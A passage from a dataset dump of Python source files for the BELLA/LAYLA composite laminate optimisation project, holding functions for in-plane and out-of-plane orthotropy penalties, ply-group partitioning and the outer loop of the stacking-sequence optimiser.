src.BELLA.multipanels import MultiPanel\r\n from src.BELLA.parameters import Parameters\r\n from src.BELLA.obj_function import ObjFunction\r\n from src.BELLA.ply_order import calc_ply_order\r\n from src.BELLA.pdl_ini import create_initial_pdls\r\n from src.BELLA.divide_panels import divide_panels\r\n\r\n constraints = Constraints(sym=False)\r\n# constraints = Constraints(sym=True)\r\n obj_func_param = ObjFunction(constraints)\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[], n_plies=6)\r\n multipanel = MultiPanel([panel1])\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[1], n_plies=10)\r\n panel2 = Panel(2, constraints, neighbour_panels=[1], n_plies=8)\r\n multipanel = MultiPanel([panel1, panel2])\r\n multipanel.from_mp_to_blending_strip(\r\n constraints, parameters.n_plies_ref_panel)\r\n ply_order = calc_ply_order(multipanel, constraints)\r\n\r\n indices = ply_order[-1]\r\n n_plies_to_optimise = indices.size\r\n mom_areas_plus, mom_areas = calc_mom_of_areas(\r\n multipanel, constraints, ply_order)\r\n\r\n print('mom_areas_plus')\r\n print(mom_areas_plus[0])\r\n print(mom_areas_plus[1])\r\n print(sum(mom_areas_plus[0]))\r\n print(sum(mom_areas_plus[1]))\r\n print('mom_areas')\r\n print(mom_areas[0])\r\n print(mom_areas[1])\r\n print(sum(mom_areas[0]))\r\n print(sum(mom_areas[1]))\r\n\r\n print('*** Test for the functions calc_mom_of_areas2 ***\\n')\r\n divide_panels(multipanel, parameters, constraints)\r\n pdl = create_initial_pdls(\r\n multipanel, constraints, parameters, obj_func_param)[0]\r\n\r\n cummul_areas, cummul_first_mom_areas, cummul_sec_mom_areas = \\\r\n calc_mom_of_areas2(\r\n multipanel, constraints, mom_areas_plus, pdl, n_plies_to_optimise)\r\n\r\n print('cummul_areas')\r\n print(cummul_areas)\r\n\r\n print('cummul_first_mom_areas')\r\n print(cummul_first_mom_areas)\r\n\r\n print('cummul_sec_mom_areas')\r\n print(cummul_sec_mom_areas)\r\n\r\n"
},
{
"alpha_fraction": 0.4907154142856598,
"alphanum_fraction": 0.5708938837051392,
"avg_line_length": 37.23728942871094,
"blob_id": "7f0c66cbfa5aa88786fd96c8a13ff4f1e5f6aabf",
"content_id": "a3981711a5589f009915403b44e795a2ecf977f7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13894,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 354,
"path": "/src/guidelines/ipo_oopo.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions related to orthotropy requirements\r\n\r\n- calc_penalty_ipo\r\n calculates penalties for the balance constraint based on lamination\r\n parameters\r\n\r\n- ipo_param_1_12\r\n calculates the twelve laminate in-plane orthotropy parameters\r\n\r\n- ipo_param_1_6\r\n calculates the first six laminate in-plane orthotropy parameters\r\n\r\n- ipo_param_7_12\r\n calculates the last six laminate in-plane orthotropy parameters\r\n\r\n- calc_penalty_ipo_param\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n parameters\r\n\r\n- calc_penalty_ipo_oopo_mp\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n lamination parameters for a multi-panel structure\r\n\r\n- calc_penalty_ipo_oopo_ss\r\n calculates penalties for in-plane and out-of plane orthotropy based\r\n lamination parameters for a single-panel structure\r\n\r\n- calc_penalty_oopo_ss\r\n calculates penalties for out-of plane orthotropy based lamination\r\n parameters for a single-panel structure\r\n \"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.divide_panels import divide_panels\r\n\r\ndef ipo_param_1_12(lampam, material, sym):\r\n 'calculates the twelve laminate in-plane orthotropy parameters'\r\n # extensional stifness matrix\r\n A11 = (material.U1 + material.U2*lampam[0] + material.U3*lampam[1])\r\n A12 = (- material.U3*lampam[1] + material.U4)\r\n A22 = (material.U1 - material.U2*lampam[0] + material.U3*lampam[1])\r\n A66 = (- material.U3*lampam[1] + material.U5)\r\n A16 = (0.5*material.U2*lampam[2] + material.U3*lampam[3])\r\n A26 = (0.5*material.U2*lampam[2] - material.U3*lampam[3])\r\n param1 = A16/A11\r\n param2 = A16/A12\r\n param3 = A16/A66\r\n param4 = A26/A12\r\n param5 = A26/A22\r\n param6 = A26/A66\r\n if sym:\r\n param7 = (A12*A26 - A22*A16)/(A22*A66 - A26*A26)\r\n param8 = (A12*A26 - A22*A16)/(A16*A26 - A12*A66)\r\n param9 = (A12*A26 - A22*A16)/(A11*A22 - A12*A12)\r\n param10 = (A12*A16 - A11*A26)/(A16*A26 - A12*A66)\r\n param11 = (A12*A16 - A11*A26)/(A11*A66 - A16*A16)\r\n param12 = (A12*A16 - A11*A26)/(A11*A22 - A12*A12)\r\n else:\r\n # coupling stifness matrix\r\n B11 = (0.25)*(material.U2*lampam[4] + material.U3*lampam[5])\r\n B12 = (0.25)*(- material.U3*lampam[5])\r\n B22 = (0.25)*(- material.U2*lampam[4] + material.U3*lampam[5])\r\n B66 = (0.25)*(- material.U3*lampam[5])\r\n B16 = (0.25)*(0.5*material.U2*lampam[6] + material.U3*lampam[7])\r\n B26 = (0.25)*(0.5*material.U2*lampam[6] - material.U3*lampam[7])\r\n # bend/twist stifness matrix\r\n D11 = (1/12)*(material.U1 + material.U2*lampam[8] + material.U3*lampam[9])\r\n D12 = (1/12)*(- material.U3*lampam[9] + material.U4)\r\n D22 = (1/12)*(material.U1 - material.U2*lampam[8] + material.U3*lampam[9])\r\n D66 = (1/12)*(- material.U3*lampam[9] + material.U5)\r\n D16 = (1/12)*(0.5*material.U2*lampam[10] + material.U3*lampam[11])\r\n D26 = (1/12)*(0.5*material.U2*lampam[10] - material.U3*lampam[11])\r\n A = np.array([[A11, A12, A16],\r\n [A12, A22, A26],\r\n [A16, A26, A66]])\r\n B = np.array([[B11, B12, B16],\r\n [B12, B22, B26],\r\n [B16, B26, B66]])\r\n D = np.array([[D11, D12, D16],\r\n [D12, D22, D26],\r\n [D16, D26, D66]])\r\n # reduced menbrane compliance\r\n a = np.linalg.inv(A - B@(np.linalg.inv(D))@B)\r\n a11 = a[0, 0]\r\n a12 = a[0, 1]\r\n a22 = a[1, 1]\r\n a66 = a[2, 2]\r\n a16 = a[0, 2]\r\n a26 = a[1, 2]\r\n param7 = a16/a11\r\n param8 = a16/a12\r\n param9 = a16/a66\r\n param10 = a26/a12\r\n param11 = a26/a22\r\n param12 = a26/a66\r\n return abs(np.array([param1, param2, param3,\r\n param4, param5, param6,\r\n param7, param8, param9,\r\n param10, param11, param12]))\r\n\r\ndef ipo_param_1_6(lampam, material, sym):\r\n 'calculates the first six laminate in-plane orthotropy parameters'\r\n # extensional stifness matrix\r\n A11 = (material.U1 + material.U2*lampam[0] + material.U3*lampam[1])\r\n A12 = (- material.U3*lampam[1] + material.U4)\r\n A22 = (material.U1 - material.U2*lampam[0] + material.U3*lampam[1])\r\n A66 = (- material.U3*lampam[1]+ material.U5)\r\n A16 = (0.5*material.U2*lampam[2] + material.U3*lampam[3])\r\n A26 = (0.5*material.U2*lampam[2] - material.U3*lampam[3])\r\n param1 = A16/A11\r\n param2 = A16/A12\r\n param3 = A16/A66\r\n param4 = A26/A12\r\n param5 = A26/A22\r\n param6 = A26/A66\r\n param1 = A16/A11\r\n param2 = A16/A12\r\n param3 = A16/A66\r\n param4 = A26/A12\r\n param5 = A26/A22\r\n param6 = A26/A66\r\n return abs(np.array([param1, param2, param3,\r\n param4, param5, param6]))\r\n\r\n\r\ndef ipo_param_7_12(lampam, material, sym):\r\n 'calculates the last six laminate in-plane orthotropy parameters'\r\n # extensional stifness matrix\r\n A11 = (material.U1 + material.U2*lampam[0] + material.U3*lampam[1])\r\n A12 = (- material.U3*lampam[1] + material.U4)\r\n A22 = (material.U1 - material.U2*lampam[0] + material.U3*lampam[1])\r\n A66 = (- material.U3*lampam[1] + material.U5)\r\n A16 = (0.5*material.U2*lampam[2] + material.U3*lampam[3])\r\n A26 = (0.5*material.U2*lampam[2] - material.U3*lampam[3])\r\n if sym:\r\n param7 = (A12*A26 - A22*A16)/(A22*A66 - A26*A26)\r\n param8 = (A12*A26 - A22*A16)/(A16*A26 - A12*A66)\r\n param9 = (A12*A26 - A22*A16)/(A11*A22 - A12*A12)\r\n param10 = (A12*A16 - A11*A26)/(A16*A26 - A12*A66)\r\n param11 = (A12*A16 - A11*A26)/(A11*A66 - A16*A16)\r\n param12 = (A12*A16 - A11*A26)/(A11*A22 - A12*A12)\r\n else:\r\n # coupling stifness matrix\r\n B11 = (0.25)*(material.U2*lampam[4] + material.U3*lampam[5])\r\n B12 = (0.25)*(- material.U3*lampam[5])\r\n B22 = (0.25)*(- material.U2*lampam[4] + material.U3*lampam[5])\r\n B66 = (0.25)*(- material.U3*lampam[5])\r\n B16 = (0.25)*(0.5*material.U2*lampam[6] + material.U3*lampam[7])\r\n B26 = (0.25)*(0.5*material.U2*lampam[6] - material.U3*lampam[7])\r\n # bend/twist stifness matrix\r\n D11 = (1/12)*(material.U1 + material.U2*lampam[8] + material.U3*lampam[9])\r\n D12 = (1/12)*(- material.U3*lampam[9] + material.U4)\r\n D22 = (1/12)*(material.U1 - material.U2*lampam[8] + material.U3*lampam[9])\r\n D66 = (1/12)*(- material.U3*lampam[9] + material.U5)\r\n D16 = (1/12)*(0.5*material.U2*lampam[10] + material.U3*lampam[11])\r\n D26 = (1/12)*(0.5*material.U2*lampam[10] - material.U3*lampam[11])\r\n A = np.array([[A11, A12, A16],\r\n [A12, A22, A26],\r\n [A16, A26, A66]])\r\n B = np.array([[B11, B12, B16],\r\n [B12, B22, B26],\r\n [B16, B26, B66]])\r\n D = np.array([[D11, D12, D16],\r\n [D12, D22, D26],\r\n [D16, D26, D66]])\r\n # reduced menbrane compliance\r\n a = np.linalg.inv(A - B@(np.linalg.inv(D))@B)\r\n a11 = a[0, 0]\r\n a12 = a[0, 1]\r\n a22 = a[1, 1]\r\n a66 = a[2, 2]\r\n a16 = a[0, 2]\r\n a26 = a[1, 2]\r\n param7 = a16/a11\r\n param8 = a16/a12\r\n param9 = a16/a66\r\n param10 = a26/a12\r\n param11 = a26/a22\r\n param12 = a26/a66\r\n return abs(np.array([param7, param8, param9,\r\n param10, param11, param12]))\r\n\r\n\r\ndef calc_penalty_ipo_param(param, threshold):\r\n \"\"\"\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n parameters\r\n \"\"\"\r\n return max(np.array([max(0, abs(param[ii]))\r\n for ii in range(param.size)]))/param.size\r\n# return sum(np.array([max(0, abs(param[ii]) - threshold)/threshold\\\r\n# for ii in range(param.size)]))/param.size\r\n\r\n\r\ndef calc_penalty_ipo(lampam, cummul_areas=1):\r\n \"\"\"\r\n calculates penalties for the balance constraint based on lamination\r\n parameters\r\n \"\"\"\r\n if lampam.ndim == 2:\r\n n_panels = lampam.shape[0]\r\n penalties_ipo = np.zeros((n_panels,), dtype=float)\r\n for ind_panel in range(n_panels):\r\n penalties_ipo[ind_panel] = (\r\n abs(lampam[ind_panel][2]) + abs(lampam[ind_panel][3])) / 2\r\n else:\r\n penalties_ipo = (abs(lampam[2]) + abs(lampam[3])) / 2\r\n return cummul_areas * penalties_ipo\r\n\r\n\r\ndef calc_penalty_ipo_oopo_mp(\r\n lampam,\r\n constraints,\r\n penalty_ipo_switch=True,\r\n parameters=None,\r\n mat=0,\r\n cummul_areas=1,\r\n cummul_sec_mom_areas=1):\r\n \"\"\"\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n lamination parameters for a multi-panel structure\r\n\r\n INPUTS\r\n\r\n - lampam: panel lamination parameters\r\n - mat: material properties of the laminae\r\n - constraints: design and maufacturing constraints\r\n - parameters: optimiser parameters\r\n - cummul_areas: sum of the areas of the plies retrieved so far + the\r\n current plies\r\n - cummul_sec_mom_areas: sum of the second moments of areas of the plies\r\n retrieved so far + the current plies\r\n \"\"\"\r\n if parameters is None:\r\n calculate_penalty = True\r\n\r\n n_panels = lampam.shape[0]\r\n penalties_ipo = np.zeros((n_panels,), dtype=float)\r\n penalties_oopo = np.zeros((n_panels,), dtype=float)\r\n if calculate_penalty:\r\n for ind_panel in range(n_panels):\r\n # penalty for in-plane orthotropy\r\n if constraints.ipo and penalty_ipo_switch:\r\n penalties_ipo[ind_panel] = (\r\n abs(lampam[ind_panel][2]) + abs(lampam[ind_panel][3])) / 2\r\n # penalty for out-of-plane orthotropy\r\n if constraints.oopo:\r\n penalties_oopo[ind_panel] = (\r\n abs(lampam[ind_panel][10]) + abs(lampam[ind_panel][11])) / 2\r\n return cummul_areas * penalties_ipo, cummul_sec_mom_areas * penalties_oopo\r\n\r\n\r\n\r\ndef calc_penalty_oopo_ss(lampam, constraints, cummul_sec_mom_areas=1):\r\n \"\"\"\r\n calculates penalties for out-of plane orthotropy based lamination\r\n parameters for a single-panel structure\r\n\r\n INPUTS\r\n\r\n - lampam: lamination parameters\r\n - constraints: design and maufacturing constraints\r\n - cummul_sec_mom_areas: sum of the second moments of areas of the plies\r\n retrieved so far + the current plies\r\n \"\"\"\r\n \r\n if (isinstance(lampam, list) and len(lampam) > 1) or lampam.ndim == 2:\r\n if (isinstance(lampam, list) and len(lampam) > 1):\r\n n_ss = len(lampam)\r\n else:\r\n n_ss = lampam.shape[0]\r\n \r\n penalties_oopo = np.zeros((n_ss,), dtype=float)\r\n if constraints.oopo:\r\n for ind_ss in range(n_ss):\r\n penalties_oopo[ind_ss] = (\r\n abs(lampam[ind_ss][10]) + abs(lampam[ind_ss][11])) / 2\r\n else:\r\n penalties_oopo = 0\r\n if constraints.oopo:\r\n penalties_oopo = (abs(lampam[10]) + abs(lampam[11])) / 2\r\n\r\n return cummul_sec_mom_areas * penalties_oopo\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ss = np.array([0, 45, 45, -45, -45, 90, 45, 90])\r\n ss = np.hstack((ss, np.flip(ss, axis=0)))\r\n lampam = calc_lampam(ss)\r\n E11 = 130e9\r\n E22 = 9e9\r\n nu12 = 0.3\r\n G12 = 4e9\r\n threshold = 0.01\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12)\r\n sym = False\r\n print(\"\"\"*** Test for the functions calc_penalty_ipo_param and ipo_param***\\n\"\"\")\r\n param = ipo_param_1_6(lampam, mat, sym)\r\n print(f'In-plane orthotropy parameters = \\n {param[0:6]}\\n')\r\n print(f'calc_penalty_ipo : {calc_penalty_ipo_param(param, threshold)}\\n')\r\n param = ipo_param_7_12(lampam, mat, sym)\r\n print(f'In-plane orthotropy parameters = \\n {param[0:6]}\\n')\r\n print(f'calc_penalty_ipo : {calc_penalty_ipo_param(param, threshold)}\\n')\r\n param = ipo_param_1_12(lampam, mat, sym)\r\n print(f'In-plane orthotropy parameters = \\n {param[0:6]} \\n{param[6:12]}\\n')\r\n print(f'calc_penalty_ipo : {calc_penalty_ipo_param(param, threshold)}\\n')\r\n\r\n\r\n print('\\n*** Test for the functions calc_penalty_ipo_oopo_mp***\\n')\r\n constraints = Constraints(bal=True, oopo=True)\r\n parameters = Parameters(constraints)\r\n lampam = 0.22*np.ones((2, 12))\r\n lampam_target = 0.11*np.ones((2, 12))\r\n lampam_weightings = np.ones((12,), dtype=float)\r\n E11 = 130e9\r\n E22 = 9e9\r\n nu12 = 0.3\r\n G12 = 4e9\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12)\r\n panel_1 = Panel(ID=1,\r\n neighbour_panels=[2],\r\n lampam_target=0.66*np.ones((12,), dtype=float),\r\n n_plies=12,\r\n area=1,\r\n constraints=constraints)\r\n panel_2 = Panel(ID=2,\r\n lampam_target=0.66*np.ones((12,), dtype=float),\r\n n_plies=10,\r\n area=1,\r\n constraints=constraints)\r\n panel_1.lampam_weightings = np.ones((12,), dtype=float)\r\n panel_2.lampam_weightings = np.ones((12,), dtype=float)\r\n boundaries = np.array([[0, 1]])\r\n multipanel = MultiPanel(panels=[panel_1, panel_2])\r\n print(calc_penalty_ipo_oopo_mp(\r\n lampam,\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat=mat,\r\n cummul_areas=4,\r\n cummul_sec_mom_areas=20))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6142417788505554,
"alphanum_fraction": 0.6229507923126221,
"avg_line_length": 36.52631759643555,
"blob_id": "f4e3e1526cd0e317217de4048b3c54438c0ae4b0",
"content_id": "6177ca4736ba46d8e4d179bae4e16658fa3320f8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5856,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 152,
"path": "/src/LAYLA_V02/divide_laminate_asym.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction partitioning laminates into groups of plies for asymmetric laminates\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport math as ma\r\nimport numpy as np\r\n\r\nclass PartitioningError(Exception):\r\n \"Exceptions during partitioning laminates into groups of plies\"\r\n\r\ndef divide_laminate_asym(parameters, targets, step=0):\r\n '''\r\n performs the partitioning of the plies for U-laminates.\r\n\r\n OUTPUTS\r\n\r\n - n_plies_in_groups: number of plies in each group of plies\r\n - pos_first_ply_groups: position of the first ply of each group\r\n with a numbering starting from the bottom to the top of the laminate\r\n - n_groups: the number of steps to be performed by the algorithm\r\n\r\n INPUTS\r\n\r\n - parameters: parameters of the optimiser\r\n - targets.n_plies: number of plies\r\n - step: number of the outer steps\r\n '''\r\n mini = ma.ceil(targets.n_plies/parameters.group_size_max[step])\r\n maxi = ma.floor(targets.n_plies/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError('''\r\nPartitioning of the laminate not possible with for asymmetric laminates with\r\nthe current ply-group size limitations.\r\nTry increasing the maximum number of plies per group or reducing the minimum\r\nnumber of plies per group.\r\n''')\r\n\r\n # iteration with increasing number of groups\r\n for n_groups in np.arange(mini, maxi + 1):\r\n # ?\r\n missing = n_groups * parameters.group_size_max[step] \\\r\n - targets.n_plies\r\n if missing > (parameters.group_size_max[step] \\\r\n - parameters.group_size_min)*n_groups:\r\n continue\r\n\r\n #\r\n if n_groups == 0:\r\n continue\r\n\r\n # distribution of parameters.group_size_min plies in each group\r\n n_plies_in_groups = parameters.group_size_min \\\r\n * np.ones((n_groups,), int)\r\n\r\n # n_extra: number of remaining plies to be distributed in the groups\r\n n_extra = targets.n_plies - n_groups*parameters.group_size_min\r\n\r\n # n_n_full_groups: number of groups that can be totally filled by the\r\n # distribution of the remianing plies\r\n if n_extra >= parameters.group_size_max[step] \\\r\n - parameters.group_size_min and n_extra != 0:\r\n n_full_groups = n_extra // (\r\n parameters.group_size_max[step] - parameters.group_size_min)\r\n n_extra %= (\r\n parameters.group_size_max[step] - parameters.group_size_min)\r\n else:\r\n n_full_groups = 0\r\n\r\n if n_full_groups > 0:\r\n n_plies_in_groups[-n_full_groups:] \\\r\n = parameters.group_size_max[step]\r\n # Addition of the last other plies\r\n if n_extra != 0:\r\n n_plies_in_groups[-(n_full_groups + 1)] += n_extra\r\n\r\n # order_of_groups: group sizes in the order in which they\r\n # appear in the stacking sequence\r\n middle_point = ma.ceil(n_groups/2)\r\n order_of_groups = np.zeros((n_groups,), int)\r\n order_of_groups[:middle_point] = n_plies_in_groups[0:2*middle_point:2]\r\n order_of_groups[middle_point:] = np.flip(\r\n n_plies_in_groups[1:n_groups:2], axis=0)\r\n\r\n # pos_of_groups: position of the first ply of each\r\n # group in the order they appear in the final stacking sequence\r\n pos_of_groups = np.zeros((n_groups,), int)\r\n# pos_of_groups[0] = 1\r\n for ind in np.arange(1, n_groups):\r\n pos_of_groups[ind] = pos_of_groups[ind - 1] \\\r\n + order_of_groups[ind - 1]\r\n\r\n pos_first_ply_groups = np.ones((n_groups,), int)\r\n pos_first_ply_groups[0:2*middle_point:2] = pos_of_groups[:middle_point]\r\n pos_first_ply_groups[1:n_groups:2] = np.flip(\r\n pos_of_groups[middle_point:], axis=0)\r\n break\r\n\r\n # checking group sizes are correct (should not return an error!!!)\r\n if sum(n_plies_in_groups) != targets.n_plies:\r\n raise PartitioningError('Wrong partitioning!')\r\n\r\n# if n_groups == 1:\r\n# if parameters.group_size_max[step] < 4:\r\n# print('''\r\n#The number of plies of the last group (parameters.group_size_max) is\r\n#recommended to be equal to or greater than 4.\r\n#''')\r\n# if parameters.group_size_min < 4:\r\n# print('''\r\n#The number of plies of the smaller groups (parameters.group_size_min) is\r\n#recommended to be equal to or greater than 4.\r\n#''')\r\n# elif n_groups > 1:\r\n# if parameters.group_size_min < 4:\r\n# print('''\r\n#The number of plies of the smaller groups (parameters.group_size_min) is\r\n#recommended to be equal to or greater than 4.\r\n#''')\r\n# if parameters.group_size_max[step] < 5:\r\n# print('''\r\n#The number of plies of the last group (parameters.group_size_max) is\r\n#recommended to be equal to or greater than 5.\r\n#''')\r\n if n_groups > maxi:\r\n raise PartitioningError('''\r\nNo partition possible of the plies into groups of smaller size\r\nparameters.group_size_minand bigger size parameters.group_size_max.\r\nIncrease parameters.group_size_max or decrease parameters.group_size_min.\r\n''')\r\n return n_plies_in_groups, pos_first_ply_groups, n_groups\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.LAYLA_V02.parameters import Parameters\r\n from src.LAYLA_V02.targets import Targets\r\n constraints = Constraints(sym=False, bal=True)\r\n targets = Targets(n_plies=200)\r\n parameters = Parameters(\r\n constraints=constraints,\r\n n_outer_step=5,\r\n group_size_min=3,\r\n group_size_max=6)\r\n n_plies_in_groups, pos_first_ply_groups, n_groups \\\r\n = divide_laminate_asym(parameters, targets)\r\n print(n_plies_in_groups)\r\n print(pos_first_ply_groups)\r\n print(n_groups)\r\n"
},
{
"alpha_fraction": 0.6023063659667969,
"alphanum_fraction": 0.6111934185028076,
"avg_line_length": 39.46491241455078,
"blob_id": "f52befa540bf9db81caf0c854625c4b450c3098a",
"content_id": "a6a8e6bfa22887ba7b0480670c7fd3d88546ddfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9452,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 228,
"path": "/src/LAYLA_V02/optimiser.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction arranging the outer loops of the optimisation technique LAYLA\r\n\r\nFirst outer loop:\r\n Layerwise approach and partial lamination parameters of unknown plies\r\n assumed as 0 (quasi-isotropicity)\r\n\r\nThe refinement loops:\r\n Layerwise approach and partial lamination parameters of unknown plies\r\n calculated based on the orientation of plies at same locations taken from\r\n a previously determined stacking sequence\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\n\r\nfrom src.LAYLA_V02.divide_laminate_sym import divide_laminate_sym\r\nfrom src.LAYLA_V02.divide_laminate_asym import divide_laminate_asym\r\nfrom src.LAYLA_V02.ply_order import calc_ply_order, calc_levels\r\nfrom src.LAYLA_V02.moment_of_areas import calc_mom_of_areas\r\nfrom src.LAYLA_V02.results import LAYLA_Results\r\n\r\nfrom src.LAYLA_V02.outer_step_sym import outer_step_sym\r\nfrom src.LAYLA_V02.outer_step_asym import outer_step_asym\r\n\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.CLA.lampam_functions import calc_lampam_from_delta_lp_matrix\r\nfrom src.CLA.lampam_functions import calc_delta_lampam\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ssI\r\n\r\n\r\ndef LAYLA_optimiser(parameters, constraints, targets,\r\n mat_prop=None, not_constraints=None):\r\n \"\"\"\r\n performs the retrieval of stacking sequences from lamination parameter\r\n targets\r\n\r\n OUTPUTS\r\n\r\n - LAYLA_results: results of the optimisation\r\n\r\n INPUTS\r\n\r\n - parameters: parameters of the optimiser\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n - mat_prop: material properties\r\n \"\"\"\r\n\r\n # details # do not consider\r\n if not_constraints is not None and not constraints.sym:\r\n raise Exception(\"\"\"\r\nSet of constraints that must not be satisfied only accounted for symmetric\r\nlaminates\"\"\")\r\n\r\n # filter the lamination parameters for orthotropy requirements\r\n targets.filter_target_lampams(constraints)\r\n\r\n if constraints.sym:\r\n if targets.n_plies % 2 == 1:\r\n middle_ply = int((targets.n_plies + 1) / 2)\r\n else:\r\n middle_ply = 0\r\n\r\n ply_order = calc_ply_order(constraints, targets)\r\n\r\n # division of the laminates in groups of plies\r\n if constraints.sym:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_sym(parameters, targets, step=0)\r\n else:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_asym(parameters, targets, step=0)\r\n\r\n levels_in_groups = calc_levels(ply_order, n_plies_in_groups, n_groups)\r\n\r\n # mom_areas: signed ply moments of areas\r\n # cummul_mom_areas: cummulated positive ply moments of areas\r\n # group_mom_areas: ply-group positive moments of areas\r\n mom_areas, cummul_mom_areas, group_mom_areas = calc_mom_of_areas(\r\n constraints, targets, ply_order, n_plies_in_groups)\r\n\r\n # lampam_weightings: lamination parameter weightings at each level of the\r\n # search (used in the objective function calculation)\r\n lampam_weightings = parameters.lampam_weightings_final * np.hstack((\r\n np.matlib.repmat(cummul_mom_areas[:, 0][:, np.newaxis], 1, 4),\r\n np.matlib.repmat(cummul_mom_areas[:, 1][:, np.newaxis], 1, 4),\r\n np.matlib.repmat(cummul_mom_areas[:, 2][:, np.newaxis], 1, 4)))\r\n lampam_weightings = np.array([\r\n lampam_weightings[ind]/sum(lampam_weightings[ind]) \\\r\n for ind in range(lampam_weightings.shape[0])])\r\n\r\n # calculation of ply partial lamination parameters\r\n if constraints.sym:\r\n delta_lampams = np.empty((targets.n_plies // 2 + targets.n_plies % 2,\r\n constraints.n_set_of_angles, 12), float)\r\n for ind in range(delta_lampams.shape[0]):\r\n delta_lampams[\r\n ind, :, 0:4] = mom_areas[ind, 0] * constraints.cos_sin\r\n delta_lampams[ind, :, 4:8] = 0\r\n delta_lampams[\r\n ind, :, 8:12] = mom_areas[ind, 2] * constraints.cos_sin\r\n else:\r\n delta_lampams = np.empty((\r\n targets.n_plies, constraints.n_set_of_angles, 12), float)\r\n for ind in range(lampam_weightings.shape[0]):\r\n delta_lampams[\r\n ind, :, 0:4] = mom_areas[ind, 0] * constraints.cos_sin\r\n delta_lampams[\r\n ind, :, 4:8] = mom_areas[ind, 1] * constraints.cos_sin\r\n delta_lampams[\r\n ind, :, 8:12] = mom_areas[ind, 2] * constraints.cos_sin\r\n\r\n # asummed lamination parameters for ech ply groups\r\n lampam_assumed = np.zeros((n_groups, 12), float)\r\n\r\n results = LAYLA_Results(parameters, targets)\r\n\r\n for n_outer_step in range(parameters.n_outer_step):\r\n print('n_outer_step', n_outer_step)\r\n\r\n if constraints.sym:\r\n outputs = outer_step_sym(\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n lampam_weightings=lampam_weightings,\r\n parameters=parameters,\r\n constraints=constraints,\r\n targets=targets,\r\n lampam_assumed=lampam_assumed,\r\n n_plies_in_groups=n_plies_in_groups,\r\n levels_in_groups=levels_in_groups,\r\n middle_ply=middle_ply,\r\n n_groups=n_groups,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints)\r\n else:\r\n outputs = outer_step_asym(\r\n cummul_mom_areas=cummul_mom_areas,\r\n delta_lampams=delta_lampams,\r\n lampam_weightings=lampam_weightings,\r\n parameters=parameters,\r\n constraints=constraints,\r\n targets=targets,\r\n lampam_assumed=lampam_assumed,\r\n n_plies_in_groups=n_plies_in_groups,\r\n levels_in_groups=levels_in_groups,\r\n n_groups=n_groups,\r\n mat_prop=mat_prop,\r\n not_constraints=not_constraints)\r\n\r\n lampam_check = calc_lampam_from_delta_lp_matrix(\r\n outputs.ss_best, constraints, delta_lampams)\r\n check_lay_up_rules(outputs.ss_best, constraints)\r\n\r\n if sum(abs(outputs.lampam_best - lampam_check)) > 1e-10:\r\n raise Exception('Lamination parameters not matching lay-up')\r\n\r\n if outputs.ss_best.size != targets.n_plies:\r\n raise Exception('Stacking sequence with incorrect ply count')\r\n\r\n results.ss_tab[n_outer_step] = outputs.ss_best\r\n results.lampam_tab_tab[n_outer_step] = outputs.lampam_best\r\n results.obj_tab[n_outer_step] = outputs.obj_const\r\n# results.n_obj_func_calls_tab[n_outer_step] = outputs.n_obj_func_calls\r\n results.n_designs_last_level_tab[\r\n n_outer_step] = outputs.n_designs_last_level\r\n results.n_designs_repaired_tab[\r\n n_outer_step] = outputs.n_designs_repaired\r\n results.n_designs_repaired_unique_tab[\r\n n_outer_step] = outputs.n_designs_repaired_unique\r\n\r\n # if the stacking sequence is the same or good enough, exit the loop\r\n if n_outer_step == 0:\r\n if outputs.obj_const < 1e-10:\r\n break\r\n 